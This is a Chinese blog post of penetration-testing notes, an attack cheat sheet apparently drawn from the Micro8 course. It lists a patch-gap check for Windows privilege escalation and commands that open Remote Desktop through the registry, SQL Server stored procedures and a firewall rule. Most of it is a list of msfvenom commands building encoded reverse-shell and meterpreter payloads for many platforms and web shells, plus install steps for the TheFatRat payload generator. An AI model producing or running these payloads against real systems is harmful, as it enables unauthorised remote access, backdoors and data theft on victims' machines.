Micropoor笔记

于 2021-08-17 18:58:04 发布
阅读量186 收藏 1
点赞数 1
分类专栏: 小计 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/119763675
版权

windows提权

systeminfo>windowsvul.txt&(for %i in (KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780)do @type windowsvul.txt|@find /i "%i"||@echo %i you can fuck)

开启远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD
/d 00000000 /f

sql server 命令

1.是否开启远程桌面,1表示关闭,0表示开启

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'

2.读取远程桌面端口

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

3.开启远程桌面

EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

reg文件开启远程桌面:

Windows Registry Editor Version 5.00HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]"fDenyTSConnections"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]"PortNumber"=dword:00000d3d

保存micropoor.reg,并执行regedit /s micropoor.reg
注:如果第一次开启远程桌面,部分需要配置防火墙规则允许远程端口。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

4.关闭远程桌面

EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal
Server','fDenyTSConnections','REG_DWORD',1;

msfvenom常用生成payload命令

windows:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

mac:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

android:

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell:

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw > shell.php

aspx:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war

nodejs:

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f c

便捷化payload生成:
项目地址:https://github.com/Screetsec/TheFatRat

git clone https://github.com/Screetsec/TheFatRat.git
//设置时需要挂墙
chmod +x fatrat
chmod +x pwerfull.sh
chmod +x setup.sh
./setup.sh

附录:
中文使用说明:
Options:
-p, --payload 使用指定的payload
–payload-options 列出该payload参数
-l, --list [type] 列出所有的payloads
-n, --nopsled 为payload指定一个 nopsled 长度
-f, --format 指定payload生成格式
–help-formats 查看所有支持格式
-e, --encoder 使用编码器
-a, --arch 指定payload构架
–platform 指定payload平台
–help-platforms 显示支持的平台
-s, --space 设定payload攻击荷载的最大长度
–encoder-space The maximum size of the encoded payload
(defaults to the -s value)
-b, --bad-chars 指定bad-chars 如: ‘\x00\xff’
-i, --iterations 指定编码次数
-c, --add-code 指定个win32 shellcode 文件
-x, --template 指定一个 executable 文件作为模板
-k, --keep payload自动分离并注入到新的进程
-o, --out 存放生成的payload
-v, --var-name 指定自定义变量
–smallest Generate the smallest possible payload
-h, --help 显示帮助文件

Scorpio-m7
关注
专栏目录
php安全新闻早八点-高级持续渗透-第二季关于后门补充一
Micropoor
12-25 3003
文章转载于:https://micropoor.blogspot.hk/2017/12/php_24.html 这次继续围绕第一篇,第一季关于后门:https://micropoor.blogspot.hk/2017/12/php.html 做整理与补充。在深入一步细化demo notepad++。 后门是渗透测试的分水岭,它分别体现了攻击者对目标机器的熟知程度,环境,编程语言,了
渗透的本质是信息搜集(第一季)
Micropoor
03-01 8256
目标资产信息搜集的程度,决定渗透过程的复杂程度。目标主机信息搜集的深度,决定后渗透权限持续把控。渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。----Micropoor文章将连载,从几方面论证,渗透的本质是信息搜集。一次完整的网络渗透,不仅仅是与目标管理人员的权限争夺,一次完整的网络渗透,它分为两大块,技术业务与信息分析业务。而技术业务要辅助并且要为信息分析业务提供强大的支...
跟随micropoor前辈之渗透笔记(1)
Y-Y-K的博客
03-22 1288
寻找出win的exp 一.exp 1.微软官方: https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/securitybulletins 2.github的项目: https://github.com/SecWiki/windows-kernel-exploits 二.检测 可运用语法检测 systeminfo&g...
跟随micropoor前辈之渗透笔记(3)
Y-Y-K的博客
03-27 375
笔记的原书来源于Micropoor前辈的Micro8,这里我仅对我感兴趣的地方做些自己的学习笔记,开头会注明来自哪几节课。 以下来自第8节课 由于师傅写的已经很清楚了,这里只做思路和其他介绍 模拟诉求攻击情况介绍 事件过程:拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情 况。 思路:拿到一个目标主站(win08 R2)shell,搜集信息,然后拿下第二台服务器,搜集信息,...
跟随micropoor前辈之渗透笔记(2)
Y-Y-K的博客
03-22 575
笔记的原书来源于Micropoor前辈的Micro8,这里我仅对我感兴趣的地方做些自己的学习笔记,开头会注明来自哪几节课。 以下来自第6节课 由于师傅写的已经很清楚了,这里只做思路和其他介绍 反攻溯源情况介绍 事件过程:某厂商日志分析发现IP,但是日志记录的其中行为直接大量登陆内网,并无攻击 过程,以及攻击手法,导致内网安全加固不知从何下手,并且不知道有什么后门需要清除, 而且日志里攻击者IP为...
Gtihub学习Micro8安全笔记(第一课)之windows提权-快速查找exp
小白渣的博客
06-19 656
专注APT攻击与防御 https://micropoor.blogspot.com/ 这是大佬他自己的博客,但是不知道为啥访问不了,可能是他那边没开docket 微软官方时刻关注列表网址: https://technet.microsoft.com/zh-cn/library/security/dn639106.aspx 比如常用的几个已公布的exp:KB2592799,KB3000061,KB2592799等。 快速查找未打补丁的exp,可以最安全的减少目标机的未知错误,以免影响业务。 命令行下执行检
Gtihub学习Micro8安全笔记(第三课)之Delphi代码审计--项目实战1
小白渣的博客
06-19 424
本来想看一下那个第二课Linux提权的,可是文件可能被Micro大佬给被删掉了!!! 专注APT攻击与防御 https://micropoor.blogspot.com/ 程序的主要function,与procedure **注:**Delphi吧操作数据的方法分成了两种,一种是function,另一种是procedure,大致理解为“函数”,“过程”。 Procedure类似于C语言中的无返回值函数,即VOID,而function就是C语言中的有返回值函数,即没有VOID。 程序分为两种连接数据库的模式
为什么会有这个博客
Micropoor
12-29 3032
渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式表现出来。当这个行业做久了,你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。当年某大佬把这条经验传递给我,同样,今天变成老家伙的我,也希望把这条经验传递下去。 文中一定会出现笔误或者不对的地方
一生一世学不完系列-红蓝对抗.pdf
09-04
8. **攻防测试手册** (如PHP安全新闻早8点课程, https://github.com/Micropoor/Micro8): 这类资料提供了攻防演练的具体方法和技巧。 9. **红队与蓝队资源** (如Awesome-Red-Teaming, ...
一些不错的网页
墨鱼菜鸡
12-06 2387
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
PHP安全新闻早8点特别篇
03-31
PHP安全新闻早8点特别篇-----ASP代码安全审计
查询windows补丁for循环遇到的坑
qq_36992014的博客
03-06 140
0x01在cmd中执行 时 systeminfo>micropoor.txt&for %i in ( KB977165 KB2160329 KB2503665 KB2592799KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i warin
PHP安全(三)
zalvsa的专栏
08-28 873
接下来谈控制文件上传的几个问题1、控制文件的大小。可以通过修改php.ini 的 post_max_size 来控制大小 ,或者通过函数filesize判断上传文件大小来限制。但是 filesize函数有局限,就是当文件大小超过2G的时候则失效。2、控制文件上传的类型。比如一些EXE、COM文件,甚至是PHP文件也加以禁止。这个可通过判断文件的扩展名获得。3、修改文件的名称
cmd命令不识别exp_第一课:windows提权-快速查找exp
weixin_39939530的博客
12-20 582
大佬们再看此文章前可以看一下序言,小的感激不尽,欢迎各位大佬批评指正大神的github链接:https://github.com/Micropoor/Micro8以下内容需要配合大神的课件进行观看,只是个人解释,感谢大家的阅读。systeminfo>micropoor.txt&(for %i in (KB977165KB2160329KB2503665KB2592799 KB...
内网渗透----Linux下信息收集
浅笑996的博客
12-04 4548
1.系统类型 cat /etc/issue查看系统名称 Lsb-release查看系统名称、版本号 2. 内核版本 uname –a 查看所有信息 ls /root |grep vmlinuz 3. 进程 ps aux 查看进程信息 ps –ef查看进程信息 4. 安装的软件包 使用dpkg –l查看安装的软件包 5. 服务配置 查看apache配置文件 6. 网络...
软件与哲学(1)——为什么会有这个系列
jonah_king的博客
11-11 747
   第一次听说,软件设计中,应该利用哲学的思想,实在工作第三年的时候。    当时是一个技术上的领导,找我谈话,讨论软件的问题。  就提醒我说,咱们公司的软件设计专家,在设计软件的时候,都会使用哲学思想。 当时的我,对这种说法,是相当鄙视的。   因为我觉得,软件就是软件,哲学就是哲学,不能为了炫耀自己的水平,就强说自己设计的软件和哲学有关系。   其实再此前的一段期间里,自己的信仰,也几...
搜集1
蓝法典的专栏
03-12 1103
公告插入==========================================================在本地建立个提交文件 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("hackbin") lP.SaveToFile
通过NETBIOS实现信息收集与渗透
IBM_lover的专栏
01-09 1872
 http://www.wangchao.net.cn/bbsdetail_1464332.html 网络 div:eq(0) > div:eq(3) > table:eq(2) > tbody:eq(0) > tr:eq(0) > td:eq(0) > div:eq(0) > #content:eq(0)" anchorType="parent">入侵者通常采取的第一步是通过 div:e
JavaEE全栈学习笔记
"这是一份综合性的JavaEE学习笔记,由作者续祥整理,涵盖了从基础的Java知识到JavaEE的深入内容,还包括了Unix、Core Java、Java 5.0(Tiger)的新特性、XML以及Oracle数据库的相关学习资料。笔记详细介绍了各个主题的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值